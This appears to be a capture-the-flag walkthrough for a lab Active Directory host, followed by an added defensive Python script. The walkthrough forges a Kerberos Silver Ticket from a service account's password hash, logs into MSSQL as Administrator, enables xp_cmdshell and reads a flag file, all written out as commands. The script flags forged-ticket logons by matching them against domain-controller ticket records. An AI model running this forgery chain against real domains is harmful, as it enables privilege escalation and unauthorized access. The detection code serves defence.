You have a SQL service account and its password. You want to access the SQL Server with an Administrator service ticket so that you can run xp_cmdshell to escalate privileges to SYSTEM.
Practices
# Service Account: svc_sql
# Password: REGGIE1234ronnie

# Create an NTLM hash from the password
# (hashlib's md4 depends on the local OpenSSL build and may be unavailable)
iptracej@kali ~/h/Escape> python3
>>> import hashlib
>>> hashlib.new('md4', 'REGGIE1234ronnie'.encode('utf-16le')).digest().hex()
'1443ec19da4dac4ffc953bca1b57b4cf'

# Get Domain SID
getPac.py sequel.htb/sql_svc:REGGIE1234ronnie -targetUser Administrator
sudo ntpdate -u sequel.htb
# Domain SID: S-1-5-21-4078382237-1492182817-2568127209

# Create a Silver Ticket
# We set a fake SPN on this ticket
ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn Hahahah/dc.sequel.htb Administrator

# Access to MSSQL
KRB5CCNAME=Administrator.ccache mssqlclient.py -k administrator@dc.sequel.htb

# MSSQL
SQL> enable_xp_cmdshell
SQL> xp_cmdshell whoami
SQL> select x from OpenRowset(BULK 'C:\Users\Administrator\Desktop\root.txt', SINGLE_CLOB) R(x)
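
A Silver Ticket like the one above is built offline from the service account's NT hash, so the domain controller never issues it and the service host sees a Kerberos logon with no matching ticket request on the DC. The following is an added example (not part of the original notes) of that correlation over constructed, simplified event records; the field names and the `service_account` enrichment are assumptions.

```python
from datetime import datetime, timedelta

# Assumptions: 10 h is the default service-ticket lifetime in AD; tune both values to policy.
TICKET_LIFETIME = timedelta(hours=10)
CLOCK_SKEW = timedelta(minutes=5)

# Constructed, simplified records (not real log exports).
# TGS: service tickets issued by the DC (the information carried by event 4769).
TGS = [
    {"time": "2023-06-01T09:00:00", "user": "alice", "service_account": "sql_svc"},
]
# LOGONS: Kerberos network logons on the service host (event 4624, logon type 3),
# enriched with the account the accepting service runs as (hypothetical field).
LOGONS = [
    {"time": "2023-06-01T09:05:00", "user": "alice", "service_account": "sql_svc"},
    {"time": "2023-06-01T09:40:00", "user": "Administrator", "service_account": "sql_svc"},
    {"time": "2023-06-01T20:30:00", "user": "ALICE", "service_account": "sql_svc"},
]

def ts(value):
    return datetime.fromisoformat(value)

def key(record):
    # Account names are case-insensitive in AD.
    return record["user"].lower(), record["service_account"].lower()

def logons_without_tgs(logons, tgs_events, lifetime=TICKET_LIFETIME, skew=CLOCK_SKEW):
    """Return logons that no DC-issued ticket can account for."""
    issued = {}
    for event in tgs_events:
        issued.setdefault(key(event), []).append(ts(event["time"]))
    unexplained = []
    for logon in logons:
        when = ts(logon["time"])
        # A logon is covered if a ticket for the same user and service was
        # issued at most one ticket lifetime (plus skew) before it.
        covered = any(-skew <= when - t <= lifetime + skew
                      for t in issued.get(key(logon), []))
        if not covered:
            unexplained.append(logon)
    return unexplained

if __name__ == "__main__":
    for hit in logons_without_tgs(LOGONS, TGS):
        print(hit["time"], hit["user"], "->", hit["service_account"], "no matching ticket request")
```

A hit is a lead rather than proof: gaps in DC log collection produce the same result, so confirm log coverage before escalating.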